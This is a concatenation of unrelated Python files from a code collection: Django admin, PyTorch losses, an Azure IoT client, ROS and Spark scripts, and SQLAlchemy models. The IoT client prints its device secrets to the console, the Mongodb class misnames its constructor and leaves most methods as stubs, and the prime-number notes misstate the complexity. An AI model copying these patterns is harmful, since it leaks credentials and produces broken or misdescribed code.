Section_fieldsets = deepcopy(PageAdmin.fieldsets)
Section_fieldsets[0][1]["fields"].insert(-1, "illustration")
Section_fieldsets[0][1]["fields"].insert(-1, "color")
Section_fieldsets[0][1]["fields"].insert(-1, "caption_color")
Section_fieldsets[0][1]["fields"].insert(-1, "text_color")
Section_fieldsets[0][1]["fields"].insert(-1, "sub_title")
Section_fieldsets[0][1]["fields"].insert(-1, "caption")
class SectionAdmin(PageAdmin):
fieldsets = Section_fieldsets
Slot_fieldsets = deepcopy(PageAdmin.fieldsets)
Slot_fieldsets[0][1]["fields"].insert(-1, "master")
Slot_fieldsets[0][1]["fields"].insert(-1, "illustration")
Slot_fieldsets[0][1]["fields"].insert(-1, "color")
Slot_fieldsets[0][1]["fields"].insert(-1, "text_color")
Slot_fieldsets[0][1]["fields"].insert(-1, "pull_image_left")
Slot_fieldsets[0][1]["fields"].insert(-1, "caption")
class SlotAdmin(PageAdmin):
fieldsets = Slot_fieldsets
Team_fieldsets = deepcopy(PageAdmin.fieldsets)
Team_fieldsets[0][1]["fields"].insert(-1, "prenom")
Team_fieldsets[0][1]["fields"].insert(-1, "fonction")
Team_fieldsets[0][1]["fields"].insert(-1, "email")
Team_fieldsets[0][1]["fields"].insert(-1, "illustration_1")
Team_fieldsets[0][1]["fields"].insert(-1, "illustration_2")
Team_fieldsets[0][1]["fields"].insert(-1, "illustration_3")
class TeamAdmin(PageAdmin):
fieldsets = Team_fieldsets
Network_fieldsets = deepcopy(PageAdmin.fieldsets)
Network_fieldsets[0][1]["fields"].insert(-1, "prenom")
Network_fieldsets[0][1]["fields"].insert(-1, "poste")
Network_fieldsets[0][1]["fields"].insert(-1, "university")
Network_fieldsets[0][1]["fields"].insert(-1, "ville")
Network_fieldsets[0][1]["fields"].insert(-1, "pays")
class NetworkAdmin(PageAdmin):
fieldsets = Network_fieldsets
Sponsor_fieldsets = deepcopy(PageAdmin.fieldsets)
Sponsor_fieldsets[0][1]["fields"].insert(-1, "logo")
Sponsor_fieldsets[0][1]["fields"].insert(-1, "type_sponsor")
Sponsor_fieldsets[0][1]["fields"].insert(-1, "lien")
class SponsorAdmin(PageAdmin):
fieldsets = Sponsor_fieldsets
Press_fieldsets = deepcopy(PageAdmin.fieldsets)
Press_fieldsets[0][1]["fields"].insert(-1, "caption_color")
Press_fieldsets[0][1]["fields"].insert(-1, "color")
Press_fieldsets[0][1]["fields"].insert(-1, "pressKit_fr")
Press_fieldsets[0][1]["fields"].insert(-1, "pressKit_en")
class MediaAssetInline(admin.TabularInline):
model = MediaAsset
extra = 12
class PressFilesAdmin(PageAdmin):
fieldsets = Press_fieldsets
inlines = (MediaAssetInline,)
admin.site.register(HomePage, HomePageAdmin)
admin.site.register(Section, SectionAdmin)
admin.site.register(Slot, SlotAdmin)
admin.site.register(Team, TeamAdmin)
admin.site.register(Network, NetworkAdmin)
admin.site.register(Sponsor, SponsorAdmin)
admin.site.register(PressFiles, PressFilesAdmin)
# BLOG ADMIN (model modified through settings)
blog_fieldsets = deepcopy(BlogPostAdmin.fieldsets)
blog_fieldsets[0][1]["fields"].insert(-2, "video")
class MyBlogPostAdmin(BlogPostAdmin):
fieldsets = blog_fieldsets
admin.site.unregister(BlogPost)
admin.site.register(BlogPost, MyBlogPostAdmin)
|
991,454 | d4c534f889a528f4922048c885c1f2488bcdbe17 |
from xai.brain.wordbase.nouns._loincloth import _LOINCLOTH
#calss header
class _LOINCLOTHS(_LOINCLOTH, ):
def __init__(self,):
_LOINCLOTH.__init__(self)
self.name = "LOINCLOTHS"
self.specie = 'nouns'
self.basic = "loincloth"
self.jsondata = {}
|
991,455 | 0cd5a2f55bb009f3baebe3da3b4f32daccc57bb0 | # ==================================================================================
# File: deviceclient.py
# Author: Larry W Jordan Jr (larouex@gmail.com)
# Use: Created and send telemetry to Azure IoT Central with this persisted
# device client
#
# https://github.com/Larouex/cold-hub-azure-iot-central
#
# (c) 2021 Larouex Software Design LLC & Zena is Awesome Software & Zena is Awesome Software
# This code is licensed under MIT license (see LICENSE.txt for details)
# ==================================================================================
import json, sys, time, string, threading, asyncio, os, copy
import logging
# uses the Azure IoT Device SDK for Python (Native Python libraries)
from azure.iot.device.aio import IoTHubDeviceClient
from azure.iot.device import Message
from azure.iot.device import MethodResponse
# our classes
from classes.secrets import Secrets
class DeviceClient():
def __init__(self, Log, DeviceName):
self.logger = Log
# Azure Device
self.device_name = DeviceName
self.device_secrets = []
self.device_client = None
# -------------------------------------------------------------------------------
# Function: connect
# Usage: The connect function creates the device instance and connects
# -------------------------------------------------------------------------------
async def connect(self):
try:
# load the secrets
secrets = Secrets(self.logger)
secrets.init()
self.device_secrets = secrets.get_device_secrets(self.device_name)
print("here secrets")
print(self.device_secrets)
self.device_client = IoTHubDeviceClient.create_from_symmetric_key(
symmetric_key = self.device_secrets["Device"]["Secrets"]["DeviceSymmetricKey"],
hostname = self.device_secrets["Device"]["Secrets"]["AssignedHub"],
device_id = self.device_name,
websockets=True
)
await self.device_client.connect()
self.logger.info("[DEVICE CLIENT] %s" % self.device_client)
except Exception as ex:
self.logger.error("[ERROR] %s" % ex)
self.logger.error("[TERMINATING] We encountered an error creating and connecting the device in the Class::DeviceClient" )
return None
return
# -------------------------------------------------------------------------------
# Function: send_telemetry
# Usage: Loads the Map Telemetry File that Maps Telemtry for Azure
# Iot Central to the Node Id's for the Opc Server.
# -------------------------------------------------------------------------------
async def send_telemetry(self, Telemetry, InterfacelId, InterfaceInstanceName):
msg = Message(json.dumps(Telemetry))
msg.content_encoding = "utf-8"
msg.content_type = "application/json"
msg.custom_properties["$.ifname"] = InterfaceInstanceName
msg.custom_properties["$.ifid"] = InterfacelId
await self.device_client.send_message(msg)
self.logger.info("[MESSAGE] %s" % msg)
# -------------------------------------------------------------------------------
# Function: disconnect
# Usage: Disconnects from the IoT Hub
# -------------------------------------------------------------------------------
async def disconnect(self):
self.device_client.disconnect()
return
|
991,456 | 4e7432471668218a7d6c180aef830a7fa70d79b3 | import geopandas as gpd
from shapely.geometry import Polygon
#lat_point_list = [-16.2, -16.2, -19.4, -19.4, -16.2]
#lon_point_list = [ 176.4, 179.1, 179.1, 176.4, 176.4]
#lat_point_list = [ -17.2982, -17.2982, -18.3024, -18.3024, -17.2982 ]
#lon_point_list = [ 177.3083, 178.6267, 178.6267, 177.3083, 177.3083 ]
lat_point_list = [ -17.0982, -17.0982, -18.5024, -18.5024, -17.0982 ]
lon_point_list = [ 177.1083, 178.8267, 178.8267, 177.1083, 177.1083 ]
polygon_geom = Polygon(zip(lon_point_list, lat_point_list))
crs = {'init': 'epsg:4326'}
polygon = gpd.GeoDataFrame(index=[0], crs=crs, geometry=[polygon_geom])
print(polygon.geometry)
#polygon.to_file(filename='polygon.geojson', driver='GeoJSON')
polygon.to_file(filename='fiji-aoi.shp', driver="ESRI Shapefile")
|
991,457 | abdd26a91cded96378c8d8a832a976423e8a1035 | import torch
import torch.nn as nn
import torch.nn.functional as F
import scipy.ndimage as ndimage
class FocalLoss3d_ver1(nn.Module):
def __init__(self, gamma=2, pw=10, threshold=1.0, erode=3, backzero=0):
super().__init__()
self.gamma = gamma
self.pw=pw
self.threshold=threshold
self.erode=erode
self.backzero=backzero
def forward(self, input, target):
# Inspired by the implementation of binary_cross_entropy_with_logits
weight=torch.clamp(target,min=0,max=self.threshold)
weight=weight-self.threshold*(weight==self.threshold).to(torch.float)
kernel=torch.ones(1, 1, 2*self.erode+1, 2*self.erode+1, 2*self.erode+1).to(torch.device("cuda"))
weight=F.conv3d(weight , kernel , padding=self.erode)
weight=(weight>0).to(torch.float)
weight=1+weight*self.pw
if self.backzero != 0 :
mask=((input<0).to(torch.float))*((target==0).to(torch.float))
mask=(1-mask)
weight=weight*mask
if not (target.size() == input.size()):
raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
diff=target-input
loss=torch.abs(diff)*weight
return loss.mean()
class FocalLoss3d_ver2(nn.Module):
def __init__(self, gamma=2, pw=10, erode=2, is_weight=0):
super().__init__()
self.gamma = gamma
self.pw=pw
self.erode=erode
self.is_weight=is_weight
def forward(self, input, target):
# Inspired by the implementation of binary_cross_entropy_with_logits
if not (target.size() == input.size()):
raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
if self.is_weight!=0:
weight_mask=(target<0.1).to(torch.float)
kernel = torch.ones(1, 1, 3, 3, 3).to(torch.device("cuda"))
weight_mask=F.conv3d(weight_mask, kernel, padding=1)
weight_mask=((weight_mask)>0).to(torch.float)
kernel=torch.ones(1, 1, 2*self.erode+1, 2*self.erode+1, 2*self.erode+1).to(torch.device("cuda"))
weight_mask=F.conv3d(weight_mask, kernel, padding=self.erode).to(torch.float)
weight_mask = 1 + weight_mask * self.pw/pow(self.erode,3)
diff=target-input
loss = torch.abs(diff)*weight_mask
return loss.mean()
elif self.is_weight==0:
diff=target-input
loss = torch.abs(diff)
return loss.mean()
return None
class DiceLoss(nn.Module):
def __init__(self):
super().__init__()
self.threshold=0.01
def forward(self, input, target):
# Inspired by the implementation of binary_cross_entropy_with_logits
loss=0
a=(input>self.threshold).to(torch.float)
b=(target>self.threshold).to(torch.float)
if(b.sum()>0):
loss += 1-2*((a*b).sum())/(a.sum()+b.sum()+self.threshold)
a = (input < -self.threshold).to(torch.float)
b = (target < -self.threshold).to(torch.float)
if (b.sum() > 0):
loss += 1-2*((a*b).sum())/(a.sum()+b.sum()+self.threshold)
return loss
class DiceDis(nn.Module):
def __init__(self, ratio1=0, gamma=2, pw=10, erode=2, is_weight=0):
super().__init__()
self.l1=DiceLoss()
self.l2=FocalLoss3d_ver2(gamma,pw,erode,is_weight)
self.ratio1=ratio1
def forward(self, input, target):
return self.ratio1*self.l1(input,target)+self.l2(input,target)
class SelfLoss(nn.Module):
def __init__(self, gamma=2, pw=10, erode=2, is_weight=0):
super().__init__()
self.coeff=0.2
def forward(self, input, target):
# Inspired by the implementation of binary_cross_entropy_with_logits
if not (target.size() == input.size()):
raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
#mask1=(input>0.01).cpu().numpy()
#mask2=(input<-0.01).cpu().numpy()
#mask1=ndimage.morphology.distance_transform_edt(mask1)*self.coeff
#mask2=ndimage.morphology.distance_transform_edt(mask2)*self.coeff
#mask=torch.from_numpy(mask1+mask2)
#radius=pow(mask.sum()*3/4/3.14,1/3)
#mask=
#mask=ndimage.morphology.distance_transform_edt(1-mask)*(input>0.01).to(torch.float)
#loss=loss.mean()
if self.is_weight!=0:
weight_mask=(target<0.1).to(torch.float)
kernel = torch.ones(1, 1, 3, 3, 3).to(torch.device("cuda"))
weight_mask=F.conv3d(weight_mask, kernel, padding=1)
weight_mask=((weight_mask)>0).to(torch.float)
kernel=torch.ones(1, 1, 2*self.erode+1, 2*self.erode+1, 2*self.erode+1).to(torch.device("cuda"))
weight_mask=F.conv3d(weight_mask, kernel, padding=self.erode).to(torch.float)
weight_mask = 1 + weight_mask * self.pw/pow(self.erode,3)
diff=target-input
loss = torch.abs(diff)*weight_mask
return loss.mean()
elif self.is_weight==0:
diff=target-input
loss = torch.abs(diff)
return loss.mean()
return None
class CircularLoss(nn.Module):
def __init__(self, gamma=2, pw=10, erode=2, is_weight=0):
super().__init__()
self.coeff=0.2
def forward(self, input, target):
# Inspired by the implementation of binary_cross_entropy_with_logits
if not (target.size() == input.size()):
raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
#mask=(target>0).cpu().numpy()
#center=ndimage.measurements.center_of_mass(mask)
#radius=pow(mask.sum()*3/4/3.14,1/3)
#mask=
#mask=ndimage.morphology.distance_transform_edt(1-mask)*(input>0.01).to(torch.float)
#loss=loss.mean()
if self.is_weight!=0:
weight_mask=(target<0.1).to(torch.float)
kernel = torch.ones(1, 1, 3, 3, 3).to(torch.device("cuda"))
weight_mask=F.conv3d(weight_mask, kernel, padding=1)
weight_mask=((weight_mask)>0).to(torch.float)
kernel=torch.ones(1, 1, 2*self.erode+1, 2*self.erode+1, 2*self.erode+1).to(torch.device("cuda"))
weight_mask=F.conv3d(weight_mask, kernel, padding=self.erode).to(torch.float)
weight_mask = 1 + weight_mask * self.pw/pow(self.erode,3)
diff=target-input
loss = torch.abs(diff)*weight_mask
return loss.mean()
elif self.is_weight==0:
diff=target-input
loss = torch.abs(diff)
return loss.mean()
return None
class FocalLoss(nn.Module):
def __init__(self, gamma=2):
super().__init__()
self.gamma = gamma
def forward(self, input, target):
# Inspired by the implementation of binary_cross_entropy_with_logits
if not (target.size() == input.size()):
raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
max_val = (-input).clamp(min=0)
loss = input - input * target + max_val + ((-max_val).exp() + (-input - max_val).exp()).log()
# This formula gives us the log sigmoid of 1-p if y is 0 and of p if y is 1
invprobs = F.logsigmoid(-input * (target * 2 - 1))
loss = (invprobs * self.gamma).exp() * loss
return loss.mean()
class TverskyLoss(nn.Module):
def __init__(self, alpha, torch_device):
super().__init__()
self.alpha = alpha
self.beta = 1 - alpha
self.smooth = 1.0
def forward(self, target_, output_):
output_ = F.sigmoid(output_)
target_f = target_.contiguous().view(-1)
output_f = output_.contiguous().view(-1)
"""
P : set of predicted, G : ground truth label
Tversky Index S is
S(P, G; a, b) = PG / (PG + aP\G + bG\P)
Tversky Loss T is
PG = sum of P * G
G\P = sum of G not P
P\G = sum of P not G
T(a, b) = PG / (PG + aG\P + bP\G)
"""
PG = (target_f * output_f).sum()
G_P = ((1 - target_f) * output_f).sum()
P_G = ((1 - output_f) * target_f).sum()
loss = (PG + self.smooth) / (PG + (self.alpha * G_P) + (self.beta * P_G) + self.smooth)
return loss
if __name__ == "__main__":
target = torch.tensor([[0,1,0],[1,1,1],[0,1,0]], dtype=torch.float)
output = torch.tensor([[1,1,0],[0,0,0],[1,0,0]], dtype=torch.float)
loss = TverskyLoss(0.3, torch.device("cpu"))
print("Loss : ", loss(target, output))
|
991,458 | 9b26d506029353748090fd9ba1ddaa26105a4035 | from django.conf.urls import url, include
from django.contrib import admin
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
# Project apps
url(r'^first-draft/', include('apps.first_draft.urls', namespace='first-draft')),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls))
]
|
991,459 | 5c32c15b9d72150894a40499573c9098bb6f2c8d | import cv2
import numpy as np
import matplotlib.pyplot as plt
# 取得する色の範囲を指定する
lower_yellow = np.array([100,100,100])
upper_yellow = np.array([150,150,150])
cap = cv2.VideoCapture(0)
cascade = cv2.CascadeClassifier('TrainingAssistant/results/cascades/tegaki_maru2/cascade.xml') #分類器の指定
while(1):
# フレームを取得
ret, frame = cap.read()
# フレームをHSVに変換
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
circles= cascade.detectMultiScale(frame, 1.1, 3) #物体の検出
for (x, y, w, h) in circles:
upper_left = (x, y)
bottom_right = (x+w, y+h)
cv2.rectangle(frame, upper_left, bottom_right, (255, 20, 147), thickness=3) #円の描画
cv2.imshow("display", frame)
# qを押したら終了
k = cv2.waitKey(1)
if k == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
991,460 | 2cf922d1ef305316909ba84801aff210ae8a2151 | import json
from sqlalchemy import Column, Integer, String, ForeignKey
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm.session import sessionmaker
from Pub.RabbitMQ import RabbitMQInfo
import sqlalchemy
from os import path
'''
sql config
'''
with open(path.split(path.abspath(__file__))[0]+"/sqlConfig.json") as f:
t = f.read()
sqlConfig = json.loads(t)
'''
sqlalchemy engine
'''
engine = create_engine(sqlConfig["sqlFilePath"], echo = False)
Base = declarative_base()
class ConnectionLink(Base):
# (id,datetime,url,client,link1,link2,link3,linkmid,link4,link5,link6,server)
__tablename__ = "connectionlinks"
request_id = Column(Integer, primary_key = True, nullable = False)
url_id = Column(Integer, ForeignKey('urls.url_id'))
datetime = Column(Integer)
client = Column(String, nullable = False)
link1 = Column(Integer, ForeignKey('links.id'))
link2 = Column(Integer, ForeignKey('links.id'))
link3 = Column(Integer, ForeignKey('links.id'))
linkmid = Column(Integer, ForeignKey('links.id'))
link4 = Column(Integer, ForeignKey('links.id'))
link5 = Column(Integer, ForeignKey('links.id'))
link6 = Column(Integer, ForeignKey('links.id'))
server = Column(String)
def __repr__(self):
return "<ConnectionLink(request_id='%s',datetime='%s',url_id=%s,(client):%s->%s(server))>" % (
self.request_id, self.datetime, self.url_id, self.client, self.server)
def toJson(self):
return json.dumps({c.name: getattr(self, c.name, None) for c in self.__table__.columns})
class Link(Base):
# # id,datetime,my_ip,next_ip,next_port,prev_circ_id,next_circ_id,direction,stream_id,is_origin,url
__tablename__ = "links"
id = Column(Integer, primary_key = True, nullable = False)
request_id = Column(Integer, nullable = True)
url_id = Column(Integer, ForeignKey('urls.url_id'))
datetime = Column(Integer)
prev_circ_id = Column(Integer)
next_circ_id = Column(Integer)
my_ip = Column(String)
next_ip = Column(String)
next_port = Column(Integer)
direction = Column(Integer)
stream_id = Column(Integer)
is_origin = Column(Integer)
def __repr__(self):
return "<Link(request_id='%s',datetime='%s',my_ip=%s,next_ip=%s>" % (
self.request_id, self.datetime, self.my_ip, self.next_ip)
class Url(Base):
__tablename__ = "urls"
# id,url,server_ip
url_id = Column(Integer, primary_key = True, nullable = False)
url = Column(String, nullable = False)
server_ip = Column(String, nullable = True)
site_name=Column(String,nullable = True)
def __repr__(self):
return "<Url(url_id='%s',url='%s',server_ip='%s',site_name='%s')>" % (self.url_id, self.url, self.server_ip,self.site_name)
def toJson(self):
return json.dumps({c.name: getattr(self, c.name, None) for c in self.__table__.columns})
class Cell(Base):
__tablename__ = "cells"
cell_id = Column(Integer, primary_key = True, nullable = False)
my_ip = Column(String, nullable = False)
cell = Column(String, nullable = True)
def __repr__(self):
return "<Cell(cell_id='%s',my_ip=%s,cell not shown here>"%(self.cell_id,self.my_ip)
Base.metadata.create_all(engine)
|
991,461 | dcb6372256401f63b4a4232bbee277b35a4e28e3 | from unittest import TestCase, main
from project.card.card import Card
from project.card.card_repository import CardRepository
from project.card.magic_card import MagicCard
class TestCardRepository(TestCase):
def setUp(self):
self.card_rep = CardRepository()
self.magic_card = MagicCard('A')
def test_init(self):
self.assertEqual(0, self.card_rep.count)
self.assertListEqual([], self.card_rep.cards)
def test_add_to_card_with_same_name_raise_error(self):
self.card_rep.add(self.magic_card)
new_card = MagicCard('A')
with self.assertRaises(ValueError) as exc:
self.card_rep.add(new_card)
self.assertEqual(str(exc.exception), "Card A already exists!")
def test_add_card_successfully(self):
self.card_rep.add(self.magic_card)
self.assertIn(self.magic_card, self.card_rep.cards)
def test_after_add_a_card_count_increase(self):
self.card_rep.add(self.magic_card)
self.assertEqual(self.card_rep.count, 1)
def test_after_remove_should_be_decrease_count(self):
self.card_rep.add(self.magic_card)
self.assertEqual(self.card_rep.count, 1)
self.card_rep.remove('A')
self.assertEqual(self.card_rep.count, 0)
def test_remove_card_raise_error(self):
with self.assertRaises(ValueError) as exc:
self.card_rep.remove("")
self.assertEqual(str(exc.exception), "Card cannot be an empty string!")
def test_remove_card_successfully(self):
self.card_rep.add(self.magic_card)
self.assertEqual(self.card_rep.count, 1)
self.card_rep.remove('A')
self.assertNotIn(self.magic_card, self.card_rep.cards)
self.assertEqual(self.card_rep.cards, [])
def test_find_card(self):
self.card_rep.add(self.magic_card)
result = self.card_rep.find('A')
self.assertEqual(self.magic_card, result)
if __name__ == '__main__':
main()
|
991,462 | e4c7747d8e44af31e1c4ca446a4cc797e843e1ca | from abc import ABC
from typing import Dict
import motor.motor_asyncio
from application.main.config import settings
from application.main.infrastructure.database.db_interface import DataBaseOperations
from application.main.utility.config_loader import ConfigReaderInstance
class Mongodb(DataBaseOperations, ABC):
def __int__(self):
super(Mongodb, self).__init__()
self.db_config = ConfigReaderInstance.yaml.read_config_from_file(
settings.DB + '_config.yaml')
async def fetch_single_db_record(self, unique_id: str):
connection_uri = 'mongodb://' + \
str(self.db_config.test.host) + str(self.db_config.test.port)
client = motor.motor_asyncio.AsyncIOMotorClient(connection_uri)
collection = client[self.db_config.collection]
async def update_single_db_record(self, record: Dict):
connection_uri = 'mongodb://' + \
str(self.db_config.test.host) + str(self.db_config.test.port)
client = motor.motor_asyncio.AsyncIOMotorClient(connection_uri)
async def update_multiple_db_record(self, record: Dict):
connection_uri = 'mongodb://' + \
str(self.db_config.test.host) + str(self.db_config.test.port)
client = motor.motor_asyncio.AsyncIOMotorClient(connection_uri)
async def fetch_multiple_db_record(self, unique_id: str):
connection_uri = 'mongodb://' + \
str(self.db_config.test.host) + str(self.db_config.test.port)
client = motor.motor_asyncio.AsyncIOMotorClient(connection_uri)
async def insert_single_db_record(self, record: Dict):
connection_uri = 'mongodb://' + \
str(self.db_config.test.host) + str(self.db_config.test.port)
client = motor.motor_asyncio.AsyncIOMotorClient(connection_uri)
collection = client[self.db_config.collection]
document = record
return await collection.insert_one(document)
async def insert_multiple_db_record(self, record: Dict):
connection_uri = 'mongodb://' + \
str(self.db_config.test.host) + str(self.db_config.test.port)
client = motor.motor_asyncio.AsyncIOMotorClient(connection_uri)
|
991,463 | 17a8cd7204a5b0b802f95b0b1d0555b6847e0b13 | from math import sqrt
def prime_nums(n):
if type(n) != int:
raise TypeError()
if n < 0:
raise ValueError()
rslt = []
for x in range(0, n):
if is_prime(x):
rslt.append(x)
return rslt
"""
Based on.
Title: Prime Numbers
Author: James Conan
Date: N/A
Code version: Pseudocode
Availability: http://www.cs.uwc.ac.za/~jconnan/FirstYear/checkprime.txt
"""
def is_prime(num):
if num < 2:
return False # not prime
pfactor = 2
srt = sqrt(num)
while (pfactor <= srt) and not (num % pfactor == 0):
pfactor += 1
if pfactor <= srt:
return False # not prime
else:
return True # prime
"""
Asymptotic analysis
- The iteration within the prime_nums function with run n + 1 times.
- The extra iteration detects the conditions necessary for exiting the loop.
- On each iteration, the function is_prime is called with the current value of x as an arguement.
- This arguement is used to determine the number of iterations within the the is_prime function.
- The code represents a nested loop which has a complexity of O(n^2) i.e. quadratic complexity.
- It is however unlikely that this worst scenario will occur since the nested loop is capped to the square root of the input.
""" |
991,464 | c50533e019f99748c66231c6d1518c2e23360a1e | #!/usr/bin/env python
import rospy
from nav_msgs.msg import Path
from geometry_msgs.msg import Twist, TwistStamped, PoseStamped
import roslib
import rospy
import math
import tf
import numpy as np
ROBOT_FRAME = 'base'
GOAL_THRES_POS = 0.2
GOAL_THRES_ANG = 0.2
FACE_GOAL_DIST = 1.0
def getYaw(quat):
_, _, yaw = tf.transformations.euler_from_quaternion(quat)
return yaw
def getConstrainedYaw(yaw):
while yaw > math.pi:
yaw -= 2*math.pi
while yaw < -math.pi:
yaw += 2*math.pi
return yaw
def getAngleError(target, current):
dyaw = target - current
dyaw = getConstrainedYaw(dyaw)
return dyaw
def getQuatFromYaw(yaw):
return tf.transformations.quaternion_from_euler(0, 0, yaw)
class PathFollower:
def __init__(self):
self.listener = tf.TransformListener()
self.pub_twist = rospy.Publisher('/path_planning_and_following/twist', TwistStamped, queue_size=1)
self.pub_path = rospy.Publisher('/art_planner/followed_path', Path, queue_size=1, latch=True)
self.sub = rospy.Subscriber('/art_planner/path', Path, self.pathCallback)
self.current_pose = None
self.goal_pose = None
self.fixed_frame = None
self.path = None
self.path_ros = None
self.gain_pid_pos = [2, 0.0, 0.0]
self.gain_pid_ang = [5, 0.0, 0.0]
self.i = [0, 0, 0]
def pathCallback(self, path_msg):
self.fixed_frame = path_msg.header.frame_id
self.path = []
self.path_ros = path_msg
self.goal_pose = None
if len(path_msg.poses) > 1:
for ros_pose in path_msg.poses:
pos = ros_pose.pose.position
rot = ros_pose.pose.orientation
yaw = getYaw([rot.x, rot.y, rot.z, rot.w])
self.path.append([pos.x, pos.y, yaw])
self.removePathNodesBeforeIndex(1)
rospy.loginfo('Got path: ' + str(self.path))
self.i = [0, 0, 0] # Reset integrators.
else:
rospy.logwarn('Path message is too short')
def updateCurrentPose(self):
if self.fixed_frame is not None:
try:
(trans,rot) = self.listener.lookupTransform(self.fixed_frame, ROBOT_FRAME, rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.logwarn_throttle('TF lookup of pose failed')
return
self.current_pose = [trans[0], trans[1], getYaw(rot)]
else:
rospy.logwarn_throttle(1, 'Fixed frame not set.')
def publishPath(self):
if self.fixed_frame is not None:
msg = Path()
msg.header.frame_id = self.fixed_frame
if self.path_ros is not None:
msg.poses = self.path_ros.poses
self.pub_path.publish(msg)
def removePathNodesBeforeIndex(self, index):
self.path = self.path[index:]
self.path_ros.poses = self.path_ros.poses[index:]
def updateCurrentGoalPose(self):
if self.goal_pose is not None:
dx = self.goal_pose[0] - self.current_pose[0]
dy = self.goal_pose[1] - self.current_pose[1]
dist = (dx**2 + dy**2)**0.5
dyaw = getAngleError(self.goal_pose[2], self.current_pose[2])
if dist < GOAL_THRES_POS and abs(dyaw) < GOAL_THRES_ANG:
if len(self.path) > 1:
self.removePathNodesBeforeIndex(1)
else:
self.path = None
self.path_ros = None
self.publishPath()
self.goal_pose = None
# Only get new goal pose if we don't have one.
if self.goal_pose is None:
if self.current_pose is not None and self.path is not None:
# Set goal to final path segment in case we have a weird path
# and all checks fail.
largest_valid_index = 0
for i in range(len(self.path)-1):
path_segment = np.array([self.path[i+1][0] - self.path[i][0],
self.path[i+1][1] - self.path[i][1]])
robot_from_node = np.array([self.current_pose[0] - self.path[i][0],
self.current_pose[1] - self.path[i][1]])
dist_along_path = robot_from_node.dot(path_segment)
if (dist_along_path > 0):
# Robot is "in front of" the current node.
if i+1 > largest_valid_index:
largest_valid_index = i+1
else:
break
self.removePathNodesBeforeIndex(largest_valid_index)
self.goal_pose = self.path[0]
self.publishPath()
def getYawTarget(self):
dx = self.goal_pose[0] - self.current_pose[0]
dy = self.goal_pose[1] - self.current_pose[1]
dist = (dx**2 + dy**2)**0.5
if dist < FACE_GOAL_DIST:
return self.goal_pose[2]
else:
# Face towards goal.
yaw_target = math.atan2(dy, dx)
error = getAngleError(yaw_target, self.current_pose[2])
if abs(error) > math.pi*0.5:
# Face dat booty towards the goal.
yaw_target = getConstrainedYaw(yaw_target + math.pi)
return yaw_target
def computeAndPublishTwist(self):
self.updateCurrentPose()
if self.path is not None and self.current_pose is not None:
self.updateCurrentGoalPose()
if self.goal_pose is None:
return
msg = TwistStamped()
msg.header.frame_id = ROBOT_FRAME
msg.header.stamp = rospy.Time.now()
yaw = self.current_pose[2]
yaw_target = self.getYawTarget()
dx = self.goal_pose[0] - self.current_pose[0]
dy = self.goal_pose[1] - self.current_pose[1]
dyaw = getAngleError(yaw_target, self.current_pose[2])
dlon = math.cos(yaw)*dx + math.sin(yaw)*dy
dlat = -math.sin(yaw)*dx + math.cos(yaw)*dy
# Update integrator.
self.i[0] += dlon
self.i[1] += dlat
self.i[2] += dyaw
lon_rate = dlon * self.gain_pid_pos[0] + self.i[0] * self.gain_pid_pos[1]
lat_rate = dlat * self.gain_pid_pos[0] + self.i[1] * self.gain_pid_pos[1]
yaw_rate = dyaw * self.gain_pid_ang[0] + self.i[2] * self.gain_pid_ang[1]
msg.twist.linear.x = lon_rate
msg.twist.linear.y = lat_rate
msg.twist.angular.z = yaw_rate
self.pub_twist.publish(msg)
if __name__ == '__main__':
rospy.init_node('path_follower_pid')
follower = PathFollower()
rate = rospy.Rate(10) # 10hz
while not rospy.is_shutdown():
follower.computeAndPublishTwist()
rate.sleep()
#!/usr/bin/env python
# license removed for brevity
# import rospy
# from std_msgs.msg import String
# def talker():
# pub = rospy.Publisher('chatter', String, queue_size=10)
# rospy.init_node('talker', anonymous=True)
# rate = rospy.Rate(10) # 10hz
# while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
# rospy.loginfo(hello_str)
# pub.publish(hello_str)
# rate.sleep()
# if __name__ == '__main__':
# try:
# talker()
# except rospy.ROSInterruptException:
# pass
#!/usr/bin/env python
# import rospy
# from std_msgs.msg import String
# def callback(data):
# rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
# def listener():
# # In ROS, nodes are uniquely named. If two nodes with the same
# # name are launched, the previous one is kicked off. The
# # anonymous=True flag means that rospy will choose a unique
# # name for our 'listener' node so that multiple listeners can
# # run simultaneously.
# rospy.init_node('listener', anonymous=True)
# rospy.Subscriber("chatter", String, callback)
# # spin() simply keeps python from exiting until this node is stopped
# rospy.spin()
# if __name__ == '__main__':
# listener() |
991,465 | 4adb4af4e30d98b5b056f18b97508978e08bb4d3 | from pyspark import SparkConf, SparkContext
conf=SparkConf().setMaster('local').setAppName('FriendsByAge')
sc=SparkContext(conf=conf)
def parseLine(line):
fields=line.split(',')
age=int(fields[2])
numFriends=int(fields[3])
return (age, numFriends)
lines=sc.textFile("file:///SparkCourse/fakefriends.csv")
rdd=lines.map(parseLine)
totalByAge=rdd.mapValues(lambda x:(x,1)).reduceByKey(lambda x,y:(x[0]+y[0],x[1]+y[1]))
averagesByAge=totalByAge.mapValues(lambda x:x[0]/x[1])
results=averagesByAge.collect()
a=results.sort()
for result in results:
print ('People in age of: ', result[0], ' have in average: {:.0f}'.format(result[1]), ' friends', sep='') |
991,466 | 34b82743396a5c8a898bd7272d112ecfec23b9f3 | """
:mod:`common` -- Common functions and classes for supporting FRBR Redis datastore
"""
__author__ = 'Jeremy Nelson'
import urllib2,os,logging
import sys,redis
import namespaces as ns
from lxml import etree
try:
import config
